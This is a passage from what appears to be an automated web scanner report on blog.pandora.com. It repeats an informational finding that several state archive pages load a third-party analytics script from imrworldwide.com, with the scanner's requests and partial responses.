Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

17.6. http://blog.pandora.com/pandora/archives/arizona/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/arizona/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc39e-5654-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 22100
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.7. http://blog.pandora.com/pandora/archives/california/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/california/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.8. http://blog.pandora.com/pandora/archives/colorado/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/colorado/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/colorado/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.9. http://blog.pandora.com/pandora/archives/florida/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/florida/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/florida/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc4cd-5989-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 22921
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.10. http://blog.pandora.com/pandora/archives/georgia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/georgia/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/georgia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.11. http://blog.pandora.com/pandora/archives/illinois/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/illinois/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:26 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:29 GMT
ETag: "7cc4bb-4432-49881a25c3e40"
Accept-Ranges: bytes
Content-Length: 17458
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.12. http://blog.pandora.com/pandora/archives/indiana/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/indiana/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc56a-4d35-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 19765
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.13. http://blog.pandora.com/pandora/archives/louisiana/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/louisiana/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "7cc5df-4c15-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 19477
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.14. http://blog.pandora.com/pandora/archives/maine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maine/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7cc3ad-4745-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 18245
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.15. http://blog.pandora.com/pandora/archives/maryland/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maryland/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc4f2-4405-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 17413
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.16. http://blog.pandora.com/pandora/archives/massachusetts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/massachusetts/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc237-59ec-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 23020
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.17. http://blog.pandora.com/pandora/archives/michigan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/michigan/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc4c1-51d1-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 20945
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.18. http://blog.pandora.com/pandora/archives/minnesota/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/minnesota/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:35 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7cc57f-42b7-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 17079
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.19. http://blog.pandora.com/pandora/archives/mississippi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/mississippi/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:41 GMT
ETag: "7cc5dd-5202-4990aa7378940"
Accept-Ranges: bytes
Content-Length: 20994
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.20. http://blog.pandora.com/pandora/archives/missouri/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/missouri/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7cc507-5072-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 20594
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.21. http://blog.pandora.com/pandora/archives/nebraska/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/nebraska/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:50 GMT
ETag: "84e00c-4a4f-4990aa7c0dd80"
Accept-Ranges: bytes
Content-Length: 19023
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.22. http://blog.pandora.com/pandora/archives/new-jersey/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-jersey/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7ce1bc-4821-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 18465
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.23. http://blog.pandora.com/pandora/archives/new-york/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-york/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.24. http://blog.pandora.com/pandora/archives/north-carolina/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-carolina/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

